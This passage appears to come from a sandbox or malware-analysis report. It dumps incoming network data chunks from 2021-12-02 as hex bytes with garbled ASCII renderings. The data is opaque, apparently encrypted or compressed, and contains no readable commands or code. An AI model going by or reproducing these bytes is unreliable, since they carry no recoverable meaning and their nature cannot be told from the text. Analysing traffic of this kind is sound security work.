c9 6a 8c 93 9b 2d cc 25 2b 76 86 52 5e ad b6 01 96 da ef e0 f6 a0 53 f0 09 b8 ba fb 7d 94 e0 6d 9a 7b 85 34 26 08 c7 14 50 30 f1 70 06 b0 7e 69 01 Data Ascii: l%h5g$6 =X)eT}7.SOllUL&pZ:d*U^8&.4BV.(` n{msXE"JE4u$G"m/VDXy>}fW0::ud\[b,(?r+/xKFFj-%+vR^S}m{4&P0p~i
2021-12-02 06:09:37 UTC	75	IN	Data Raw: bb f8 85 98 67 71 fa 37 00 0d 98 8c 5a 8f c9 bb d6 64 bd b7 9b 54 80 3e b4 c4 12 20 f3 77 85 e4 ec 73 b1 5e 61 7b d1 7b fc e7 59 07 a5 ab 4c 0e 44 3a 98 f2 63 ad ed 03 69 46 0c 1d f5 60 f3 32 b3 5a 1f 3e 8e 82 2b 64 5c cf 3e 02 32 55 b8 09 b7 ee f1 75 a4 47 2a 5a cf e9 59 48 42 96 ac 6a e6 4d b8 bb 84 bc 69 3a 79 65 11 52 8d 90 63 25 31 0c f5 fe 4e ff 30 a5 cf e8 91 3f 49 3a 2a 72 7d c2 73 16 22 86 0f b6 69 dd 8e b7 d1 a7 9c 77 64 60 33 a9 85 ed 68 a6 51 4d 7e 87 23 53 e2 21 ed 53 0e 47 c7 b4 9f d8 77 28 ae 6d 4c a7 1a 23 5f 1c 91 e5 f8 1f 0d d5 f9 2b be ed 84 33 f1 0a c1 a2 f6 82 9f 31 88 07 4d f5 30 2c 14 6f f3 02 f5 40 4e 4a 71 7f 6e 60 68 dd 22 a2 cc ef ba 53 95 b4 b7 fa dc 10 de 9c cb 1e d7 61 02 9e 82 43 d7 ea ec fc 25 ae 04 c9 c2 f5 03 20 c1 5a 73 Data Ascii: gq7ZdT> ws^a{{YLD:ciF`2Z>+d\>2UuGZYHBjMi:yeRc%1N0?I:r}s"iwd`3hQM~#S!SGw(mL#_+31M0,o@NJqn`h"SaC% Zs
2021-12-02 06:09:37 UTC	76	IN	Data Raw: f0 44 ce 93 5e 84 7a d9 1f 10 6a 59 c5 2c 0a 75 ef 77 c3 09 ba a5 04 4a 88 08 63 97 c4 15 91 73 08 29 81 b7 d5 d0 54 84 19 bf e8 f6 08 67 b7 8b f0 a5 32 29 a9 dc 6d 07 21 fa 6d d3 04 68 ff fe fd c2 7a 31 07 e2 92 ae 73 5e e9 c6 b6 4a 98 d5 89 b6 8a 00 4c 1e df 83 55 6c 78 9b 10 c5 92 78 6c 24 0f 97 59 3d b8 b6 7d be 42 e8 33 bb 59 11 98 94 6f 6e 8a b3 3c 28 12 2a fd 60 a3 44 a2 b5 3f 8c ca b5 eb 64 ed a6 02 5c b4 9c 06 bc 30 54 43 59 87 af cd 42 c0 8e 19 a9 c9 eb 32 2f 0d 07 19 3b 2d 90 25 c5 4b 2c 41 b6 83 00 6c f1 e5 95 cc 2e 94 6b 89 ad 9e 20 61 da 3b 36 5a de e6 4d 55 97 f6 ad 2c 80 5d 6b 87 0d 03 40 b4 10 27 2a fd b0 c0 22 bc ef 88 4b 24 19 72 2b 07 df c2 ba 82 a0 fd 8c e3 7e 50 5d 25 64 f9 85 ab 99 09 e4 a2 0b bb e1 5d 3e a7 69 5a ef f4 86 30 ad 99 Data Ascii: D^zjY,uwJcs)Tg2)m!mhz1s^JLUlxxl$Y=}B3Yon<(`D?d\0TCYB2/;-%K,Al.k a;6ZMU,]k@'"K$r+~P]%d]>iZ0
2021-12-02 06:09:37 UTC	77	IN	Data Raw: 13 9b cf 60 f0 59 ea c4 71 f7 69 34 62 fc 95 82 d2 f9 14 5d e6 8b 2a 26 07 62 0a 48 9e 22 b0 28 59 68 44 c5 7d f8 f0 6e a9 e7 92 55 14 a2 3c fc 2f 09 41 6d 67 4e 7f bf 8f 36 62 a6 78 4f 11 77 30 6f ba d5 6e c8 35 3e bd 77 a1 2d 9b 7d 67 6b b1 bb d8 a9 4d 7d 7a 9f 31 e4 e0 c6 22 98 ae 2c 9b 85 ed ac 16 92 01 71 97 c8 84 17 de 58 0a 50 8f e7 44 cb ed 11 36 45 ca 76 c8 13 f6 c1 c7 f7 32 95 88 5c e2 20 5a 9d 50 49 39 1c a6 03 aa 94 a6 25 24 59 12 5f b4 e8 01 25 41 d7 e8 01 17 e1 f6 10 93 25 ca c7 56 e5 87 68 26 4b 03 1a d6 e4 df b9 b6 f3 59 77 37 89 f9 fd ba 0d 9e 0a d3 2d 77 f2 63 fc 37 fe fb 8a 4a 48 2b 4f 41 a7 69 c2 69 3b 22 ac 4c c1 3d 39 a2 eb 8a c5 60 04 b5 96 be 27 fc 9c ae 9a ed d9 17 26 7c 1c d2 d6 8c 01 f8 0f d3 9f d6 1d 88 55 1f cc 3a 05 25 a1 1b Data Ascii: `Yqi4b]*&bH"(YhD}nU</AmgN6bxOw0on5>w-}gkM}z1",qXPD6Ev2\ ZPI9%$Y_%A%Vh&KYw7-wc7JH+OAii;"L=9`'&\|U:%
2021-12-02 06:09:37 UTC	79	IN	Data Raw: 90 83 dd bc 94 d9 3f d0 30 43 62 6a f4 da e5 5c 63 d6 d1 0c 66 62 23 a1 c8 b6 17 d4 6f 1c 81 ae 29 5a 47 c3 22 4c 51 32 ea 4a eb b6 ac de 75 42 29 77 7b a9 5f 7f fd c6 b3 33 f4 f7 6e 8e e6 a4 5b 91 13 0f 3b 98 5b fd a6 ea 10 71 2a 81 34 c3 55 c1 9d 82 be 76 cf 2c 2a a3 97 f9 94 27 14 e2 f8 eb 5c 11 4f 43 0e 01 4c b7 c0 95 9b 8f 9d 72 9e b8 0f 99 77 bb 6c 6d 80 fc f4 f1 93 36 71 ee 15 a5 73 3a 10 c4 3f 0d bc cd 3a e6 d7 19 66 4c 52 66 d2 5f 97 49 47 d6 af a1 09 d3 7b 2c 3e 79 6d 2e 96 91 29 17 b9 af 0c 18 9c 25 84 4c 9d 6c 28 99 c4 97 43 fb f3 64 bd 18 a4 a0 a8 4e 88 32 96 be 83 a8 45 62 eb 92 ab 35 07 0d 31 22 65 1f 72 4c e6 1e a7 af 5c d9 98 49 b5 58 2d e9 ca 5b cc 8c 46 06 4b ab 58 d4 20 7d 8e 0e c6 e9 a1 cf c7 65 10 da c4 e7 f7 bc 4d 93 89 da 6a bb af Data Ascii: ?0Cbj\cfb#o)ZG"LQ2JuB)w{_3n[;[q4Uv,'\OCLrwlm6qs:?:fLRf_IG{,>ym.)%Ll(CdN2Eb51"erL\IX-[FKX }eMj
2021-12-02 06:09:37 UTC	80	IN	Data Raw: 58 45 da 77 4f d4 b1 ad ee 0e 99 fb 7e 38 69 ab 39 79 08 a6 f8 a2 a2 e2 20 49 96 65 41 16 10 1a 02 aa 32 c4 8c 57 99 8e 51 91 4b 3c de e2 74 23 ed 51 88 aa ef 6c da 2a dc d8 f1 bf 12 65 6d 79 3e c8 66 80 b8 71 76 c3 61 82 64 d9 09 71 fd d0 fa fb 56 7e 79 72 61 6d 16 c5 1b 61 49 5d f5 6c f2 ad 02 db ad 12 6b a3 3e 2a 87 0a d0 4d bf 43 a3 79 a9 47 cf bd 9c 69 48 b2 ef e8 d9 e2 65 17 e6 b4 7b e3 a6 46 60 e7 00 09 aa 26 b6 85 76 5f 36 4f 98 9b 24 c6 5f db 61 8e 5a ea 4c da 70 5f a9 b2 ea b7 57 96 d5 25 ba 40 43 00 d6 5a b6 4f 25 da 0c d0 4c 1e 40 94 90 66 62 5c d9 22 07 14 f3 d9 3b 6f 08 5f 93 24 f1 99 99 64 dd 99 35 b7 d3 ad 42 e4 dc 26 8d 41 a1 51 d1 a3 0b 43 46 01 fc 95 4b 70 1b 7e d3 db ce 60 02 20 07 ea 48 d3 01 fa 1b a9 f2 04 52 9d 2c 9b 2e d1 86 65 b5 Data Ascii: XEwO~8i9y IeA2WQK<t#Qlemy>fqvadqV~yramaI]lk>MCyGiHe{F`&v_6O$_aZLp_W%@CZO%L@fb\";o_$d5B&AQCFKp~` HR,.e
2021-12-02 06:09:37 UTC	81	IN	Data Raw: b0 d0 72 92 b6 23 c7 70 ce 98 6d 0d ea 5e f0 f7 bd 5e 0f 37 a6 73 95 fc 85 c1 f2 29 e4 94 2e e8 c5 df 89 d8 65 ab 7b ff f5 46 0a 77 a2 c2 9b 54 59 fe 7a 6d 88 cd 14 e9 63 75 42 f4 c3 63 da 69 e9 b0 93 10 45 6e 50 c9 f8 8c b8 d7 18 8b 1c a6 4d 88 a7 d9 56 ce a9 82 e7 46 31 67 0a 09 86 d4 7f 60 8a 8a e5 92 0d 98 6f 0c 89 37 81 71 c3 37 46 2b cf 3b 72 7e 7c 3e 5e 58 fb 2c be db 85 ed 3a 2e 47 30 1f b4 ae a6 b1 d8 82 67 91 89 7c e7 7b db 3a 8f 84 79 07 4b 3b 60 43 13 7d 2b 5e 5c d4 d2 e4 6f 6d a1 dd f2 a4 0a ee 1a 0c bd 58 11 58 3a 59 4e 08 8c c6 4e 90 eb a6 b1 89 5a 58 cd f9 50 68 5e af 1c d4 34 61 65 f4 1b dd 74 1f 32 5b 75 64 4a 34 15 b9 13 ea f0 0c 6a e7 6a f8 e8 20 bd 19 01 05 a4 2a 4e c2 d6 51 4f 69 cf 05 17 86 51 88 b3 09 b6 9f 40 1b 61 88 f8 4a ff 66 Data Ascii: r#pm^^7s).e{FwTYzmcuBciEnPMVF1g`o7q7F+;r~\|>^X,:.G0g\|{:yK;`C}+^\omXX:YNNZXPh^4aet2[udJ4jj *NQOiQ@aJf
2021-12-02 06:09:37 UTC	82	IN	Data Raw: 63 ae 37 1c df f5 86 e4 52 1c ed a1 bc 91 19 62 6f 3b c7 11 38 b4 ea d4 0e 3a 2a a5 43 4a 61 19 af de 56 57 29 77 7b ab 49 f3 7e 7d 8f 93 50 24 60 5b 44 98 f1 4a 00 f9 be 31 33 d5 fc 20 55 dc 2c e6 bc 76 d8 83 a0 70 1c 4b 4a 5a 67 8d de dd 90 50 09 1d 07 08 24 81 8b 67 63 5e 1e 2f 69 de 30 8d 2a 8d 4c 40 c7 cf 76 54 10 3a b9 f2 ae d2 8e 87 be 83 5b 79 73 3a 9d 81 c3 54 53 17 16 9f 47 cc d0 d8 3d 10 94 5f 7f 6e d0 b4 88 a2 83 d0 39 69 d5 c0 4a 39 c2 7f d7 e8 fd ee f0 0f 78 8d 0c c9 f5 92 10 e3 78 3d d4 94 79 25 bd f0 61 3b a7 4d f4 09 c9 3b 43 a7 c7 3f 49 86 64 24 a9 f2 68 c9 a0 11 54 58 07 1f 54 50 a3 ac a7 24 57 4a 2c e9 9a 04 47 4f da dd c0 b3 fa e8 d0 81 73 47 01 e9 65 47 2e 72 bf fd 3b 18 b5 f9 30 66 1c 2f 8a ae 8f 92 26 35 2d f9 49 8d 39 05 86 82 8b Data Ascii: c7Rbo;8:CJaVW)w{I~}P$`[DJ13 U,vpKJZgP$gc^/i0L@vT:[ys:TSG=_n9iJ9xx=y%a;M;C?Id$hTXTP$WJ,GOsGeG.r;0f/&5-I9
2021-12-02 06:09:37 UTC	83	IN	Data Raw: 69 39 69 b7 37 61 b6 95 f5 5b 5c 90 62 cf 9c da be 22 30 f5 71 d0 20 07 84 e8 f3 49 84 f5 5d 9b c8 bf 7d 09 e5 cf b3 76 98 d2 25 14 92 a8 0e 87 68 5e 36 d5 4c 5c 31 3e 47 49 99 0f cf d9 73 c1 14 cf 02 7d 77 72 16 bd 0f 36 96 a0 6b 96 6d 10 e4 2f 4f 08 94 ec 52 b8 c0 d4 7c a2 3e 0e aa c9 14 ba b3 da a1 b5 a9 f6 33 01 d5 ae 46 9d 94 d7 4c 7c 9e 12 2e 1b 9e 8e 19 b9 f4 47 91 c4 27 89 cd 92 77 c8 a5 6c 2d db 4c 79 53 76 9f 19 21 bd e1 9a 73 59 7c aa 8a 52 57 36 78 35 1b 7f 3b bd 28 2e 86 22 16 95 49 df a2 27 da e6 eb 0e ff e2 26 1a d2 00 4c df 3b bf 7a db 8f 6a 31 61 e3 5b 56 88 63 1e af 73 38 1f a8 29 2b b8 be 65 96 0e 8e 21 bb 16 3e 89 42 cf 90 61 0f 8e b4 44 89 86 0c df 44 99 c2 e0 1b 23 05 f4 ea 50 aa 52 aa c5 79 cc 1a 70 cd 73 fe 45 2e 94 83 96 e0 6e fe Data Ascii: i9i7a[\b"0q I]}v%h^6L\1>GIs}wr6km/OR\|>3FL\|.G'wl-LySv!sY\|RW6x5;(."I'&L;zj1a[Vcs8)+e!>BaDD#PRypsE.n
2021-12-02 06:09:37 UTC	84	IN	Data Raw: f6 fd 2d 66 b3 ed e0 2c 04 4f 2c 12 7d 37 0d 46 47 f2 35 80 0c 16 20 3d 09 45 cf 07 d9 5e db e7 cd 66 bc 2c 39 4a 15 02 41 04 01 b9 87 ee ba 74 74 f3 4a 11 dc 0d fc 7f 8c b8 fb 2c 94 60 f4 2d 88 f3 b5 c8 22 e7 5d 49 2e 13 38 12 77 8f fe c4 5a c7 9d a1 b2 32 0a 1a 20 89 71 3b 3f cc 49 cf 5c d9 34 42 86 53 cb 5c 1c 11 13 db c6 37 bb e1 7d 8e 0e 01 6c a5 32 38 9a 42 da c4 e7 30 39 45 6e 76 25 62 bb af 6d d9 6c 8e 05 b4 c4 39 c6 d3 09 67 ff b0 29 9b e4 ec 10 b1 dd fd e1 4f fe 4a f3 88 b0 ec 11 3a b1 a1 14 73 39 b1 e5 e7 59 84 61 a7 11 cd 11 b1 74 a1 50 76 d4 5e 61 33 0b 2e 35 89 56 32 b3 5a 79 b5 cb 96 7d 33 6f 30 79 64 b7 95 cd 00 dd f4 19 e9 bb b8 d5 b1 9b 8f 62 8f 37 92 c6 42 0d bd de 38 7c be 1c 3e 13 60 fa b4 eb 13 9b 26 44 0f a6 15 93 99 b3 5d cb 9d 95 Data Ascii: -f,O,}7FG5 =E^f,9JAttJ,`-"]I.8wZ2 q;?I\4BS\7}l28B09Env%bml9g)OJ:s9YatPv^a3.5V2Zy}3o0ydb7B8\|>`&D]
2021-12-02 06:09:37 UTC	86	IN	Data Raw: 3f 61 76 52 15 f3 3b 83 2c 88 62 2a ca f6 e9 9b 49 da 80 40 1e ff cf bb 81 33 ad 45 6d af 52 9f 71 d0 47 c5 e8 1e f9 41 27 4b 3e c9 a5 54 00 ba 87 a9 86 41 c2 20 c9 89 ef 7e 7b c9 e6 d2 04 08 62 f9 6f d9 e5 a7 e8 7e 26 98 40 dc 1f e0 e3 28 99 33 9b 51 d5 56 f6 a1 6a e7 e0 67 d9 13 3d 3c 11 b0 64 d2 4b fd fe 66 72 db 30 7a b9 23 d7 5d 9f 89 a9 af aa 04 14 eb ea 83 56 64 a7 d4 dd 0c 5c ef c5 18 9a 3e 98 0d 8e 01 ba ad 50 be 1f d6 92 27 62 ac 8a 31 28 3f b3 18 54 35 77 92 ee a8 3c 64 fb 35 5e b7 51 46 15 c5 7c 27 6c 03 17 e6 00 e9 90 15 0f 2f cd 30 51 9b a4 1a a4 6d 62 f3 fd e2 7c c8 02 79 85 25 fb 7e e9 d9 8c a1 6a 02 a6 84 91 59 fc 6f 62 1d 5a bd 20 96 de c4 27 a2 9b 49 cf d5 39 8f e3 85 31 a3 47 dd 7d 20 37 e0 db 3e 7b 9d 67 3a 9f 44 d3 6a ca 63 96 e5 fd Data Ascii: ?avR;,b*I@3EmRqGA'K>TA ~{bo~&@(3QVjg=<dKfr0z#]Vd\>P'b1(?T5w<d5^QF\|'l/0Qmb\|y%~jYobZ 'I91G} 7>{g:Djc
2021-12-02 06:09:37 UTC	87	IN	Data Raw: c2 4e 71 7d 8e 58 60 19 c9 46 7f ff 36 93 b0 82 5d 39 45 6e 76 73 03 ce c3 19 96 1c eb 6b e2 a5 4c aa a7 09 67 a9 d1 5c f7 90 af 7c de ae 98 b7 2e 8b 26 87 88 e3 ec 7e 3a d7 a1 60 73 4e b1 84 e7 2b 84 04 a7 4d cd 5c b1 1d a1 33 76 a6 5e 0e 33 78 2e 5a 89 30 32 c7 5a 25 b5 82 96 13 33 1b 30 1c 64 c5 95 a3 00 b8 f4 6d e9 9b b8 90 b1 e3 8f 12 8f 5b 92 a9 42 7f bd bb 38 0e be 40 3e 5a 60 94 b4 9f 13 fe 26 28 0f ca 15 fa 99 f5 5d a4 9d e7 55 07 d1 8a 14 a2 3a 25 63 52 ec 46 5d d2 bb 6c 4f b0 d2 fd 1d 72 8b 8c cf 06 15 4a d3 26 27 47 6c a6 35 53 d9 bd 26 4e 2f ef d9 b8 d8 f6 87 dc 92 d6 2c d0 7a f5 ea ca ca ee 42 1d a1 c5 7d 41 98 94 db e8 30 51 5d 1b 7a b2 68 7a f8 58 dd 15 c4 49 73 50 fd e1 16 a2 8a 67 6b f4 0d 0d 22 ae f5 4b 88 d6 ac 1e ed b2 c9 55 4f ee c7 Data Ascii: Nq}X`F6]9EnvskLg\\|.&~:`sN+M\3v^3x.Z02Z%30dm[B8@>Z`&(]U:%cRF]lOrJ&'Gl5S&N/,zB}A0Q]zhzXIsPgk"KUO
2021-12-02 06:09:37 UTC	88	IN	Data Raw: 56 8b 31 dc fd c6 f3 c7 48 7b 84 8e e4 39 0d fb ba 94 2c 3f ab a0 79 de 4a ea 6c ef 01 dd ad 3f 9b 71 a5 ce 7b 32 89 f8 42 47 63 d5 4d 3d 46 1b f7 8b da 4f 44 a7 71 7b d6 22 32 15 a4 59 7b 1f 47 4b 83 4e 8f d5 74 5b 5a 8a 5c 10 ef f0 46 e1 3a 42 96 a9 80 19 e8 61 3d ed 44 95 0a 86 b8 e0 a1 05 02 c1 a1 f8 2a 99 4a 11 6e 06 e1 62 da b2 ab 46 c5 f8 20 a4 bb 71 af 82 c1 46 c2 2c a9 21 41 47 e0 a9 1b 14 ee 01 1f f6 37 bf 36 af 27 e5 80 d3 60 ca 17 9b 86 8d df 99 dd 5e 43 4b 4e 22 b4 34 97 b7 43 1f 14 7f 59 f0 af 8c bd e1 9e 0f ff 16 3b ed d7 ed f8 0e 47 16 c3 23 70 03 af c5 e5 04 bb 00 0e 73 ff e9 46 e7 5b d5 ad 23 55 15 89 0c c9 e9 55 55 c8 c6 e3 d5 c7 5b 7f 43 7b 24 78 5f 17 90 f8 ec d4 64 4f 2a e6 c4 6a 2d 3f 45 73 2e d4 57 c7 4e cf 96 f3 8e 64 1e 80 f3 a2 Data Ascii: V1H{9,?yJl?q{2BGcM=FODq{"2Y{GKNt[Z\F:Ba=DJnbF qF,!AG76'`^CKN"4CY;G#psF[#UUU[C{$x_dOj-?Es.WNd
2021-12-02 06:09:37 UTC	90	IN	Data Raw: a5 b1 9b 8f 62 fc 46 fe af 36 68 8e 81 5b 10 d1 6f 5b 13 60 fa c7 9a 7f f2 52 21 3c f9 76 fc f5 c6 30 a5 c2 e1 30 12 a5 f9 67 8f 56 1f 17 43 df 76 32 d0 de 63 7e e1 d2 98 6e 31 e7 e5 bb 63 26 30 a3 27 42 12 0d e4 50 3e af d7 26 4e 5c 9e b5 b7 ac fa b4 ef e2 c1 49 9a 1b a8 8f e5 89 c1 37 1d d3 c5 0f 41 fd 94 b5 bb 44 3e 0b 7d 1f c6 1a 0d 8b 39 b4 67 ab 2c 1d 0c fd ac 16 cb d9 04 24 86 4b 62 76 dd a2 24 c9 b0 fe 6a a8 ee 95 1c 02 80 a8 96 a7 3f 51 08 0d 7d 76 5c 7c df 5f 62 68 41 be 95 dc fc 3c cd 95 7b 7b 99 28 d4 71 b5 85 21 28 82 11 ed f3 0d 08 11 fc 25 e1 2f 98 f1 78 97 d5 93 b0 c1 ed 60 c1 b8 93 f3 7c 9f 21 9b dc fd 42 fd 4b 7f 66 a8 e0 86 1e 96 43 16 02 9e b5 b7 eb 0a d3 fe 9f 02 68 28 ab 95 30 c1 51 6a 6a d0 ce 3a f6 5d f4 56 32 cb 9f 9c da cd 3d 11 Data Ascii: bF6h[o[`R!<v00gVCv2c~n1c&0'BP>&N\I7AD>}9g,$Kbv$j?Q}v\\|_bhA<{{(q!(%/x`\|!BKfCh(0Qjj:]V2=
2021-12-02 06:09:37 UTC	91	IN	Data Raw: 20 89 de e4 27 83 9b 74 cf ec 39 ee e3 93 31 87 47 f5 7d 0c 37 8f db 61 7b 87 67 73 9f 5b d3 57 ca 7b 96 d7 fd 01 a3 63 f5 e3 e4 ad 99 bb 5e 2c 6e 36 51 b4 68 f1 9f 25 3c 72 4d a7 88 af cd bd b5 9e 4a ff 76 3b b9 d7 88 f8 6d 07 3e a5 4d 19 6c dd a9 80 6b dd 67 61 1a 87 8c 68 94 3e 89 d5 61 30 79 89 6d 96 8a 55 3e b4 8e e3 b4 cd 2c 7f 28 10 78 1d 0f 65 e2 96 83 b1 02 23 43 d5 a8 58 48 11 36 17 72 b8 72 ab 3d cf 96 f3 ab 27 01 ef dc c7 ee c1 83 d2 07 ac 59 cf b7 71 a5 4b 68 90 be 0e c0 47 9c d1 c2 c4 ed b0 19 fe 25 ab 4b 77 5d b3 54 d5 dd 8a f7 fd b2 f1 e2 5a 17 3d 2a 96 e4 1a da f1 4c e9 6c dc 1c 1a 6b 92 04 94 64 d1 18 0f 25 58 b2 34 bf a0 ce f7 fb f6 95 76 00 33 9e 38 4f 58 4c c3 e8 f3 f1 19 e1 ab af 0f d9 37 cc 25 a4 a5 16 a2 5b bc 8c e8 83 65 56 c3 2b Data Ascii: 't91G}7a{gs[W{c^,n6Qh%<rMJv;m>Mlkgah>a0ymU>,(xe#CXH6rr='YqKhG%Kw]TZ=*Llkd%X4v38OXL7%[eV+
2021-12-02 06:09:37 UTC	92	IN	Data Raw: 7a a8 68 62 f8 55 dd 08 c4 4b 73 75 fd ac 16 cb 8a 54 6b e9 0d 12 22 8e f5 41 88 c2 ac 1c ed 8b c9 6e 4f 80 c7 c6 dd 50 38 78 61 2d 1a 33 1d ad 03 16 25 41 d1 c5 a6 93 55 bd f9 3a 17 fa 49 b7 51 da c3 54 41 ec 63 99 96 0d 6e 11 93 75 99 40 98 81 78 c7 ad f2 86 b2 d9 13 c1 cf b6 9c 0f ed 7d ff f9 fd 31 ae 17 12 2b dc 81 f6 77 c5 2d 73 02 ec b5 c1 a2 6f bd 8c ec 02 1c 28 ca c6 5c ac 3d 1e 4a a0 8a 6a 9f 32 86 24 57 bf fc 9c ae cd 52 42 17 4b 7c e5 57 96 73 bf 07 3b b9 fc 86 9a 49 df e1 5d 6d fc a0 c9 e5 3f db 49 01 ae 37 ef 71 f5 34 c1 9a 03 98 5f 42 63 48 c7 c9 53 65 de 87 c6 f4 28 a5 1a a7 b9 9a 6a 17 bd e6 c9 6b 0e 0b e5 1c bc e5 de e8 44 26 aa 40 9a 1f e1 e3 11 99 02 9b 4b d5 7e f6 b2 6a ae e0 4f d9 2e 3d 01 11 b5 64 eb 4b d7 fe 77 72 d4 30 6f b9 3f d7 Data Ascii: zhbUKsuTk"AnOP8xa-3%AU:IQTAcnu@x}1+w-so(\=Jj2$WRBK\|Ws;I]m?I7q4_BcHSe(jkD&@K~jO.=dKwr0o?
2021-12-02 06:09:37 UTC	93	IN	Data Raw: c7 45 7f 46 7b 1c 78 60 17 95 f8 f0 d4 22 4f 0e e6 cd 6a 3b 3f 45 73 13 d4 15 c7 54 cf f8 f3 cc 64 4d 80 fc a2 d3 a0 8f b6 18 c9 20 8c b6 14 b0 3f 68 d6 ba 62 f9 10 cc 86 c2 ad f6 d5 39 97 20 ce 27 77 38 f6 5f bc f5 da ca 92 a4 94 e5 29 7b 7e 45 e4 8b 63 b1 81 4c 9d 6c ef 1c 28 38 bc 6b f0 02 bd 6c 63 52 58 d3 77 bf d9 db 83 f4 82 aa 1f 07 54 a9 57 7f 31 4d a2 e9 8a df 19 87 ab db 5c 85 5f 83 49 c2 d2 70 c3 32 cc ef 81 e6 4b 0a a7 1a 71 48 8e 20 01 5c a5 6e 38 d5 42 af c4 93 30 55 45 01 76 4a 62 d0 af 31 d9 3c 8e 77 b4 ab 39 a0 d3 60 67 93 b0 4c 9b 97 ec 4c b1 92 fd 94 4f 8a 4a 9f 88 df ec 7e 3a da a1 14 73 6a b1 8a e7 3f 84 15 a7 66 cd 70 b1 06 a1 35 76 88 5e 2c 33 62 2e 56 89 24 32 dc 5a 0a b5 a4 96 1b 33 1b 30 25 64 f8 95 ab 00 bb f4 70 e9 d8 b8 b0 b1 Data Ascii: EF{x`"Oj;?EsTdM ?hb9 'w8_){~EcLl(8klcRXwTW1M\_Ip2KqH \n8B0UEvJb1<w9`gLLOJ~:sj?fp5v^,3b.V$2Z30%dp
2021-12-02 06:09:37 UTC	95	IN	Data Raw: 96 4b 16 76 9e c2 b7 c3 0a cf fe 89 02 40 28 8c 95 3d c1 4f 6a 16 d0 da 3a f3 5d f3 56 30 cb 95 9c c0 cd 21 11 4b 26 3a 91 03 e6 23 fe 5b 58 f1 9f e9 f5 3a aa 95 33 1e 88 a0 c9 e5 6c 88 24 6e da 51 9f 05 a5 43 a0 fb 70 ea 2c 27 14 14 a8 8f 21 04 ba f5 c6 c6 28 f9 49 f7 d6 f6 0c 62 c9 81 be 02 6f 65 97 6f d9 b9 82 ae 0d 72 c4 10 f9 43 93 ab 74 f6 66 e8 22 a1 33 85 d3 6a c7 c5 23 aa 72 61 48 57 d1 05 8e 39 b9 de 03 3f bd 51 1b d7 56 b6 31 f8 fd cc f3 d8 48 48 84 ba e4 24 0d c8 ba bb 2c 35 ab a9 79 ff 4a c4 6c de 01 d6 ad 25 9b 78 a5 fb 7b 0c 89 f9 42 6c 63 d2 4d 20 46 16 f7 b2 da 08 44 c9 71 1b d6 65 32 54 a4 39 7b 2e 47 26 83 2d 8f d1 74 3d 5a fe 5c 61 ef 89 46 90 3a 56 96 bb 80 48 e8 2f 3d c7 44 c8 0a da b8 cf a1 47 02 e0 a1 a0 2a c5 4a 57 6e 18 e1 62 da Data Ascii: Kv@(=Oj:]V0!K&:#[X:3l$nQCp,'!(IboeorCtf"3j#raHW9?QV1HH$,5yJl%x{BlcM FDqe2T9{.G&-t=Z\aF:VH/=DG*JWnb
2021-12-02 06:09:37 UTC	96	IN	Data Raw: a8 ee e7 6c 6e 2d ca 39 0d 52 22 fe 9a fa b0 6b e1 c4 af 3a d9 36 cc 25 a4 b7 16 b0 5b e2 8c f9 83 26 56 cb 2b 71 7d 8e 0e 24 6c d6 32 64 9a 06 da a1 e7 5c 39 30 6e 0e 25 07 bb e9 6d 8d 6c de 05 e8 c4 4a c6 ba 09 13 ff d5 29 e8 e4 c2 10 c9 dd 90 e1 23 fe 4a f3 88 b0 ec 11 3a b1 84 14 00 39 ed e5 a0 59 eb 61 e1 11 99 11 e1 74 fd 50 05 d4 3b 61 47 0b 5a 35 e0 56 5c b3 3d 79 c6 cb ca 7d 70 6f 5f 79 0a b7 fb cd 65 dd 97 19 9d bb d1 d5 de 9b e1 62 fc 37 bc c6 36 0d c5 de 4c 7c be 1c 74 13 01 fa e7 eb 55 9b 52 44 7f a6 15 93 99 b3 1c cb ff 95 39 6a b4 f9 52 fe 6e 76 33 26 ec 29 1c a0 ce 0d 3b d7 bd 98 70 40 e2 8c b5 06 70 6f d3 55 27 62 49 96 46 61 85 e5 03 4e 5c ef fc de b1 9f db b0 f7 b3 42 ea 19 da ba e5 bd c1 26 1d 8f c5 17 41 eb 94 bf bb 30 3e 5d 7d 5f c6 Data Ascii: ln-9R"k:6%[&V+q}$l2d\90n%mlJ)#J:9YatP;aGZ5V\=y}po_yeb76L\|tURD9jRnv3&);p@poU'bIFaN\B&A0>]}_
2021-12-02 06:09:37 UTC	97	IN	Data Raw: 40 b2 1f fa e3 20 99 32 9b 7b d5 6f f6 80 6a a2 e0 50 d9 01 3d 21 11 be 64 e0 4b ca fe 03 72 bd 30 1b b9 56 d7 62 9f 92 a9 95 aa 3c 14 f3 ea 85 56 7f a7 df dd 70 5c f8 c5 10 9a 27 98 03 8e 6f ba f9 50 fa 1f d1 92 13 62 e8 8a 2f 28 3f b3 1d 54 33 77 a3 ee 8e 3c 1d fb 2d 5e 85 51 57 15 d7 7c 08 6c 2e 17 ec 00 e1 90 07 0f 5a cd 03 51 8b a4 23 a4 59 62 96 fd 80 7c cd 02 4e 85 1b fb 6e e9 dd 8c c2 6a 02 a6 a1 91 46 fc 39 62 0f 5a 92 20 a8 de dd 27 eb 9b 44 cf d7 39 c3 e3 c1 31 c2 47 e5 0e 20 7e a3 a9 62 0b 9a 32 71 ef 45 bc 42 af 44 e2 c4 9c 14 c2 17 f5 ea e4 ac 99 bc 5e 30 6e 3d 51 9a 68 f2 f9 3b 5a 71 2b 59 b7 c3 cd de b5 f5 4a ff 36 1e b9 a4 88 a4 6d 0a 7e aa 4d 13 6c dd a9 8a 6b c8 67 61 1a 99 8c 32 94 07 89 ee 61 27 79 ec 6d ad 8a 30 3e a6 8e 97 b4 ae 2c Data Ascii: @ 2{ojP=!dKr0Vb<Vp\'oPb/(?T3w<-^QW\|l.ZQ#Yb\|NnjF9bZ 'D91G ~b2qEBD^0n=Qh;Zq+YJ6m~Mlkga2a'ym0>,
